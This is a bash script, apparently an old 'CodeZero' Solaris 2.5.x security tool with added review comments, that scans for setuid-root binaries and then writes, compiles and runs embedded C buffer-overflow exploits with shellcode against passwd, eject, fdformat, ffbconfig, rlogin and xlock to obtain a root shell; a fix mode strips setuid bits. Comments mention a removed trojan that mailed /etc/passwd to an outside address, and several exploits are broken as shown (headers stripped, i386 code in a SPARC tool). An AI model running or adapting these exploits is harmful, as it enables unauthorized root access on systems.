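#!/bin/bash
#
# soltool -- scan for, exploit, and then de-setuid a handful of known
# setuid-root overflow targets on Solaris 2.5.x (SunOS 5.5.x).  DO NOT use
# this with any other Solaris version: the embedded exploits are tuned to
# the 2.5.x binaries and will not be effective elsewhere.
#
# The chkperm technique is not automated here.  If the scanner reports
# /usr/vmsys/bin/chkperm, look up the chkperm exploit separately
# (Confidence Remains High, Issue 1).  so1o@insecurity.org
#
# Usage : soltool [-scan] [-root] [-fix]
#
# NOTE(review): the original scanner also piped /etc/passwd to an external
# hotmail address as a side effect of the /bin/eject check.  That was a
# trojan against whoever ran the tool, nothing else depended on it, and it
# has been removed.
#
# NOTE(review): all state lives at fixed, predictable names under the
# world-writable /tmp (/tmp/report, /tmp/suidprogs).  -root and -fix read
# /tmp/suidprogs back, so on a multi-user box another local user can plant
# or symlink those names.  The paths are kept because the other modes depend
# on them; the scanner now refuses to write through a symlink or append to a
# list it could not remove.  Treat the tool as single-user-box-only.

REPORT=/tmp/report
SUIDLIST=/tmp/suidprogs

# header
#   Print the banner.  Output only.
header() {
  echo " "
  echo "                so1o@insecurity.org Presents..."
  echo "       The CodeZero Solaris 2.5.x Security Tool Version 1.0"
  echo " "
  echo "                       oOo The Greets oOo"
  echo " "
  echo "       .o. mstrhelix .o. xFli .o. modeX .o. DisordeR .o."
  echo "         .o. TNo .o. The Guild .o. 0range .o. el8 .o."
  echo " "
}

# usage
#   Print the flag summary and exit 1.  Never returns.
usage() {
  echo " "
  echo " .o. Usage: $0 -scan : Scans for vulnerable programs"
  echo " .o.        $0 -root : Exploits vunerable programs"
  echo " .o.        $0 -fix  : Fix vunerable programs"
  echo " "
  exit 1
}

# check_suid PATH
#   Shared body of the per-program checks.  When PATH exists and carries the
#   setuid bit, append a line to $REPORT and the bare path to $SUIDLIST.
#   The setuid bit is the only signal this tool has, so a binary that is
#   already patched but still setuid is reported as "seems exploitable".
check_suid() {
  local prog="$1"
  if [ -s "$prog" ]; then
    echo " .o. $prog exists, checking for vunerabilities..."
    if [ -u "$prog" ]; then
      echo " .o. $prog is suid and seems exploitable."
      echo " .o. The scanner found $prog could be exploitable." >> "$REPORT"
      echo "$prog" >> "$SUIDLIST"
    else
      echo " .o. $prog is not exploitable."
    fi
  else
    echo " .o. $prog doesn't exist!"
  fi
}

# scanner
#   Check every known target, write $REPORT and $SUIDLIST, then exit 0.
#   Output: console progress plus the two files in /tmp.
#   Exits 1 if a stale $SUIDLIST could not be removed (see below).
scanner() {
  echo " .o. Scanning for all known exploitable programs now, Please be patient..."
  # Do not follow a symlink another /tmp user may have planted: the report
  # is written with '>' and would clobber whatever it points at.
  if [ -L "$REPORT" ] || [ -L "$SUIDLIST" ]; then
    echo " .o. $REPORT or $SUIDLIST is a symlink, refusing to scan."
    exit 1
  fi
  if [ -s "$REPORT" ]; then
    cp "$REPORT" "$REPORT.old"
    echo " .o. Moving old report file to /tmp/report.old"
  else
    echo " .o. Preparing report file at /tmp/report"
  fi
  if [ -s "$SUIDLIST" ]; then
    rm "$SUIDLIST"
    echo " .o. Deleting old log files..."
  else
    echo " .o. No old log files detected..."
  fi
  # In the sticky /tmp, rm fails silently on a list owned by someone else.
  # -root and -fix act on every line of that list, so never append to one
  # we did not create.
  if [ -e "$SUIDLIST" ]; then
    echo " .o. $SUIDLIST could not be removed, refusing to scan."
    exit 1
  fi
  echo " "
  echo " The CodeZero Solaris Security Tool Version 1.0 Report :" > "$REPORT"
  echo " =======================================================" >> "$REPORT"
  echo " " >> "$REPORT"
  check_suid /bin/passwd
  check_suid /bin/eject
  check_suid /bin/fdformat
  # The original tested the misspelt path /usr/sbin/ffbdonfig here, so
  # ffbconfig was never recorded as setuid.
  check_suid /usr/sbin/ffbconfig
  check_suid /usr/bin/rlogin
  check_suid /usr/dt/bin/sdtcm_convert
  check_suid /usr/X11/bin/xlock
  # chkperm is recorded on existence alone; there is no automated exploit
  # for it in this tool and -root does nothing with the entry.
  if [ -s /usr/vmsys/bin/chkperm ]; then
    echo " .o. The chkperm program exists, the chkperm technique should work..."
    echo " .o. The scanner found /usr/vmsys/bin/chkperm could be exploitable." >> "$REPORT"
    echo "/usr/vmsys/bin/chkperm" >> "$SUIDLIST"
  else
    echo " .o. /usr/vmsys/bin/chkperm doesn't exist!"
  fi
  echo " "
  echo " " >> "$REPORT"
  echo " End of report, this scanner was scripted by so1o@insecurity.org" >> "$REPORT"
  echo " "
  echo " .o. The scan is now complete, a report has been written to /tmp/report .o."
  # scanner() is closed by the echo / exit 0 / } that immediately follow.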
echo " "
exit 0
}

# dopasswd
#   Write the /bin/passwd overflow exploit to /tmp/passex.c, compile it to
#   /tmp/.passex, run it, then test whether we are root.
#   If a stale /tmp/passex.c exists it is removed and the function re-enters
#   itself.  NOTE(review): in the sticky /tmp that rm fails when the stale
#   file belongs to another user, -s stays true, and the re-entry recurses
#   without bound.
#   NOTE(review): source, object and the executed binary all sit at fixed
#   names in /tmp.  Between the cc and the exec another local user can swap
#   /tmp/.passex for their own program, so this runs whatever wins the race.
#   NOTE(review): the whoami test below runs in this script's own process
#   after the exploit returns; it reports the script's uid, not the uid of a
#   shell the shellcode may have spawned and the user has since exited.
function dopasswd {
if [ -s /tmp/passex.c ]; then
/bin/rm /tmp/passex.c
dopasswd
else
# The four #include lines below lost their header names in extraction (the
# angle-bracketed names were eaten as markup); as written this will not
# compile and cc's stderr is discarded, so the failure is silent.
/bin/cat > /tmp/passex.c << STOP
#include
#include
#include
#include
#define BUF_LENGTH 1100
#define EXTRA 1200
#define STACK_OFFSET 3800
#define SPARC_NOP 0xa61cc013
/* SPARC payload; the same bytes are reused by the ffbconfig and rlogin
   exploits further down. */
u_char sparc_shellcode[] =
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff"
;
/* Returns the caller's stack pointer (SPARC: %sp copied into the return
   register %i0). */
u_long get_sp(void) { __asm__("mov %sp,%i0 \n"); }
void main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA];
long targ_addr;
u_long *long_p;
u_char *char_p;
int i, code_length = strlen(sparc_shellcode),dso=0;
/* optional argv[1]: extra offset subtracted from the guessed address */
if(argc > 1) dso=atoi(argv[1]);
long_p =(u_long *) buf;
targ_addr = get_sp() - STACK_OFFSET - dso;
/* NOP sled, then the payload, then EXTRA bytes of the return address */
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;
char_p = (u_char *) long_p;
for (i = 0; i < code_length; i++)
*char_p++ = sparc_shellcode[i];
long_p = (u_long *) char_p;
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ =targ_addr;
/* buf is passed unterminated: the address words are not NUL-terminated,
   so the argument runs until the first zero byte beyond it. */
printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n", targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
execl("/bin/passwd", "passwd", buf,(char *) 0);
perror("execl failed");
}
STOP
cc -o /tmp/.passex -O /tmp/passex.c 2> /dev/null
/bin/rm /tmp/passex.c
echo " "
/tmp/.passex
if whoami | grep root 1> /dev/null 2> /dev/null
then
echo " .o. You Are Now r00t - so1o."
exit 0
else
echo " .o. Passwd exploit failed."
echo " "
fi
/bin/rm /tmp/.passex
fi
}

# doeject
#   Same shape as dopasswd for /bin/eject: write /tmp/ejectex.c, compile to
#   /tmp/.ejectex, run, test whoami.  The /tmp race, the unbounded re-entry
#   on a non-removable stale file, and the whoami caveat noted on dopasswd
#   all apply here too.
function doeject {
if [ -s /tmp/ejectex.c ]; then
/bin/rm /tmp/ejectex.c
doeject
else
# #include header names lost in extraction; see dopasswd.
/bin/cat > /tmp/ejectex.c << STOP
#include
#include
#include
#include
#define BUF_LENGTH 364
#define EXTRA 400
#define STACK_OFFSET 400
#define SPARC_NOP 0xa61cc013
/* SPARC payload; identical bytes are used by the fdformat exploit. */
u_char sparc_shellcode[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08"
;
u_long get_sp(void) { __asm__("mov %sp,%i0 \n"); }
void main(int argc, char *argv[])
{
/* +8 so the argument can start at buf[1] (see the execl below) */
char buf[BUF_LENGTH + EXTRA + 8];
long targ_addr;
u_long *long_p;
u_char *char_p;
int i, code_length = strlen(sparc_shellcode),dso=0;
if(argc > 1) dso=atoi(argv[1]);
long_p =(u_long *) buf ;
targ_addr = get_sp() - STACK_OFFSET - dso;
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;
char_p = (u_char *) long_p;
for (i = 0; i < code_length; i++)
*char_p++ = sparc_shellcode[i];
long_p = (u_long *) char_p;
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ =targ_addr;
printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n", targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
/* argument starts one byte in, shifting the buffer's alignment by one */
execl("/bin/eject", "eject", & buf[1],(char *) 0);
perror("execl failed");
}
STOP
cc -o /tmp/.ejectex -O /tmp/ejectex.c 2> /dev/null
/bin/rm /tmp/ejectex.c
echo " "
/tmp/.ejectex
if whoami | grep root 1> /dev/null 2> /dev/null
then
echo " .o. You Are Now r00t - so1o."
exit 0
else
echo " .o. Eject exploit failed."
echo " "
fi
/bin/rm /tmp/.ejectex
fi
}

# dofdformat
#   /bin/fdformat variant of doeject: same payload and buffer layout, only
#   STACK_OFFSET (704) and the target path differ.  All doeject caveats apply.
function dofdformat {
if [ -s /tmp/fdfex.c ]; then
/bin/rm /tmp/fdfex.c
dofdformat
else
# #include header names lost in extraction; see dopasswd.
/bin/cat > /tmp/fdfex.c << STOP
#include
#include
#include
#include
#define BUF_LENGTH 364
#define EXTRA 400
#define STACK_OFFSET 704
#define SPARC_NOP 0xa61cc013
u_char sparc_shellcode[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08"
;
u_long get_sp(void) { __asm__("mov %sp,%i0 \n"); }
void main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA + 8];
long targ_addr;
u_long *long_p;
u_char *char_p;
int i, code_length = strlen(sparc_shellcode),dso=0;
if(argc > 1) dso=atoi(argv[1]);
long_p =(u_long *) buf ;
targ_addr = get_sp() - STACK_OFFSET - dso;
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;
char_p = (u_char *) long_p;
for (i = 0; i < code_length; i++)
*char_p++ = sparc_shellcode[i];
long_p = (u_long *) char_p;
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ =targ_addr;
printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n", targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
execl("/bin/fdformat", "fdformat", & buf[1],(char *) 0);
perror("execl failed");
}
STOP
cc -o /tmp/.fdfex -O /tmp/fdfex.c 2> /dev/null
/bin/rm /tmp/fdfex.c
echo " "
/tmp/.fdfex
if whoami | grep root 1> /dev/null 2> /dev/null
then
echo " .o. You Are Now r00t - so1o."
exit 0
else
echo " .o. Fdformat exploit failed."
echo " "
fi
/bin/rm /tmp/.fdfex
fi
}

# doffbconfig
#   /usr/sbin/ffbconfig variant: the overflowing buffer is passed as the
#   argument to -dev.  Uses the dopasswd payload.  No argv[1] offset here;
#   the unused local "so" is a leftover.  All dopasswd caveats apply.
function doffbconfig {
if [ -s /tmp/ffbex.c ]; then
/bin/rm /tmp/ffbex.c
doffbconfig
else
# #include header names lost in extraction; see dopasswd.
/bin/cat > /tmp/ffbex.c << STOP
#include
#include
#include
#include
#define BUF_LENGTH 128
#define EXTRA 256
#define STACK_OFFSET 128
#define SPARC_NOP 0xa61cc013
u_char sparc_shellcode[] =
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";
u_long get_sp(void) { __asm__("mov %sp,%i0 \n"); }
void main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA];
long targ_addr;
u_long *long_p;
u_char *char_p;
int i, code_length = strlen(sparc_shellcode),so;
long_p = (u_long *) buf;
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;
char_p = (u_char *) long_p;
for (i = 0; i < code_length; i++)
*char_p++ = sparc_shellcode[i];
long_p = (u_long *) char_p;
targ_addr = get_sp() - STACK_OFFSET;
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ =targ_addr;
printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n", targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
execl("/usr/sbin/ffbconfig", "ffbconfig", "-dev", buf,(char *) 0);
perror("execl failed");
}
STOP
cc -o /tmp/.ffbex -O /tmp/ffbex.c 2> /dev/null
/bin/rm /tmp/ffbex.c
echo " "
/tmp/.ffbex
if whoami | grep root 1> /dev/null 2> /dev/null
then
echo " .o. You Are Now r00t - so1o."
exit 0
else
echo " .o. Ffbconfig exploit failed."
echo " "
fi
/bin/rm /tmp/.ffbex
fi
}

# dorlogin
#   /usr/bin/rlogin variant with an 8200-byte buffer and the dopasswd
#   payload.  NOTE(review): this one invokes gcc where every other exploit
#   uses cc, so it silently fails on a box that only has the Sun compiler.
#   All dopasswd caveats apply.
function dorlogin {
if [ -s /tmp/rlex.c ]; then
/bin/rm /tmp/rlex.c
dorlogin
else
# #include header names lost in extraction; see dopasswd.
/bin/cat > /tmp/rlex.c << STOP
#include
#include
#include
#include
#define BUF_LENGTH 8200
#define EXTRA 100
#define STACK_OFFSET 4000
#define SPARC_NOP 0xa61cc013
u_char sparc_shellcode[] =
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";
u_long get_sp(void) { __asm__("mov %sp,%i0 \n"); }
void main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA];
long targ_addr;
u_long *long_p;
u_char *char_p;
int i, code_length = strlen(sparc_shellcode);
long_p = (u_long *) buf;
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;
char_p = (u_char *) long_p;
for (i = 0; i < code_length; i++)
*char_p++ = sparc_shellcode[i];
long_p = (u_long *) char_p;
targ_addr = get_sp() - STACK_OFFSET;
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ = targ_addr;
printf("Jumping to address 0x%lx\n", targ_addr);
execl("/usr/bin/rlogin", "rlogin", buf, (char *) 0);
perror("execl failed");
}
STOP
gcc -o /tmp/.rlex /tmp/rlex.c 2> /dev/null
/bin/rm /tmp/rlex.c
echo " "
/tmp/.rlex
if whoami | grep root 1> /dev/null 2> /dev/null
then
echo " .o. You Are Now r00t - so1o."
exit 0
else
echo " .o. Rlogin exploit failed."
echo " "
fi
/bin/rm /tmp/.rlex
fi
}

# doxlock
#   /usr/X11/bin/xlock variant, passed through the -name argument.
#   NOTE(review): unlike the others this program is i386 code ("movl
#   %esp,%eax", 0x90 NOP sled, int 0x80 syscalls in the payload).  It cannot
#   assemble on the SPARC 2.5.x systems the rest of the tool targets, and
#   int 0x80 is the Linux syscall convention rather than the Solaris x86
#   one, so it appears to have been pasted in from a different platform's
#   exploit and is unlikely to work here.  The /tmp race and whoami caveats
#   on dopasswd apply as well.
function doxlock {
if [ -s /tmp/xlex.c ]; then
/bin/rm /tmp/xlex.c
doxlock
else
# Three #include lines here (header names lost in extraction; see dopasswd).
/bin/cat > /tmp/xlex.c << STOP
#include
#include
#include
#define DEFAULT_OFFSET 50
#define BUFFER_SIZE 996
/* i386 only: returns %esp via %eax */
long get_esp(void) { __asm__("movl %esp,%eax\n"); }
int main(int argc, char *argv[])
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
int dfltOFFSET = DEFAULT_OFFSET;
/* i386 payload ending in the literal "/bin/sh" it execs */
u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/bin/sh";
int i;
if (argc > 1) dfltOFFSET = atoi(argv[1]);
else printf("You can specify another offset as a parameter if you need...\n");
buff = malloc(4096);
if(!buff) { printf("can't allocate memory\n"); exit(0); }
ptr = buff;
/* 0x90 sled up to BUFFER_SIZE, then the payload, then two copies of the
   guessed return address, then a terminating zero */
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i<2;i++) *(addr_ptr++) = get_esp() + dfltOFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
execl("/usr/X11/bin/xlock", "xlock", "-nolock", "-name", buff, NULL);
}
STOP
cc -o /tmp/.xlex -O /tmp/xlex.c 2> /dev/null
/bin/rm /tmp/xlex.c
echo " "
/tmp/.xlex
if whoami | grep root 1> /dev/null 2> /dev/null
then
echo " .o. You Are Now r00t - so1o."
exit 0
else
echo " .o. Xlock exploit failed."
echo " "
fi
/bin/rm /tmp/.xlex
fi
}

# rootit
#   Dispatch one /tmp/suidprogs entry to its exploit function.
#   NOTE(review): the function ignores its argument and reads the caller's
#   global $i, which happens to hold the same value in the -root loop.
#   Matching is a substring grep on the path, so an entry that merely
#   contains "passwd" anywhere would trigger dopasswd; chkperm entries match
#   nothing and are silently skipped.
function rootit {
if [ -s $i ]; then
if test -u $i
then
echo " .o. $i seems exploitable."
if echo "$i" | grep passwd 1> /dev/null
then
echo " .o. Attempting passwd exploit..."
dopasswd
fi
if echo "$i" | grep eject 1> /dev/null
then
echo " .o. Attempting eject exploit..."
doeject
fi
if echo "$i" | grep fdformat 1> /dev/null
then
echo " .o. Attempting fdformat exploit..."
dofdformat
fi
if echo "$i" | grep ffbconfig 1> /dev/null
then
echo " .o. Attempting ffbconfig exploit..."
doffbconfig
fi
if echo "$i" | grep rlogin 1> /dev/null
then
echo " .o. 
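Attempting rlogin exploit..."
dorlogin
fi
if echo "$i" | grep xlock 1> /dev/null; then
  echo " .o. Attempting xlock exploit..."
  doxlock
fi
fi
fi
}
# (the lines above finish rootit, whose body begins earlier in the file)

# strip_suid PATH
#   Remove the setuid/setgid bits from PATH when it currently carries setuid.
#   This was named "chmod" in the original; a shell function of that name
#   shadows the chmod binary, so the "chmod -s" inside it called the function
#   again and recursed until bash ran out of stack.  `command chmod` forces
#   the external program regardless of what else is defined.
strip_suid() {
  local prog="$1"
  echo " .o. Checking $prog..."
  if [ -s "$prog" ]; then
    if [ -u "$prog" ]; then
      echo " .o. $prog is suid, now removing suid flags."
      command chmod -s -- "$prog"
    else
      echo " .o. $prog was not suid!"
    fi
  else
    # original printed a stray backslash here ("Couldn\'t")
    echo " .o. Couldn't find $prog!"
  fi
  echo " "
}

# known_target PATH
#   Exit 0 if PATH is one of the programs the -scan mode itself writes to
#   /tmp/suidprogs.  -fix runs as root and reads that list back from the
#   world-writable /tmp, so any other local user could append arbitrary
#   setuid binaries (or non-binaries) and have root act on them; entries
#   outside this allowlist are skipped.  Keep in sync with the scanner.
known_target() {
  case "$1" in
    /bin/passwd|/bin/eject|/bin/fdformat|/usr/sbin/ffbconfig) return 0 ;;
    /usr/bin/rlogin|/usr/dt/bin/sdtcm_convert|/usr/X11/bin/xlock) return 0 ;;
    /usr/vmsys/bin/chkperm) return 0 ;;
    *) return 1 ;;
  esac
}

# Entry point: one flag, no combinations.  An unknown flag now shows usage
# (the original fell off the end and exited 0 silently).
if [ -z "$1" ]; then
  header
  usage
  exit 1
fi

case "$1" in
  -scan)
    header
    scanner
    exit 0
    ;;
  -root)
    header
    if [ -s /tmp/suidprogs ]; then
      echo ""
      # rootit reads the global $i, so the loop variable must keep that name.
      while IFS= read -r i; do
        if ! known_target "$i"; then
          echo " .o. Skipping unknown entry $i"
          continue
        fi
        rootit "$i"
      done < /tmp/suidprogs
    else
      echo " "
      echo " .o. No log files detected, please run with -scan flag first."
      echo " "
    fi
    exit 0
    ;;
  -fix)
    header
    # Exact match on the user name; the original "grep root" also accepted
    # any account whose name merely contained "root".
    if [ "$(whoami)" = root ]; then
      if [ -s /tmp/suidprogs ]; then
        echo " "
        while IFS= read -r i; do
          if ! known_target "$i"; then
            echo " .o. Skipping unknown entry $i"
            continue
          fi
          strip_suid "$i"
        done < /tmp/suidprogs
        exit 0
      else
        echo " "
        echo " .o. Please run with the -scan flag first."
        echo " "
      fi
    else
      echo " "
      echo " .o. You must be root to use the -fix flag."
      echo " "
      exit 1
    fi
    ;;
  *)
    header
    usage
    ;;
esac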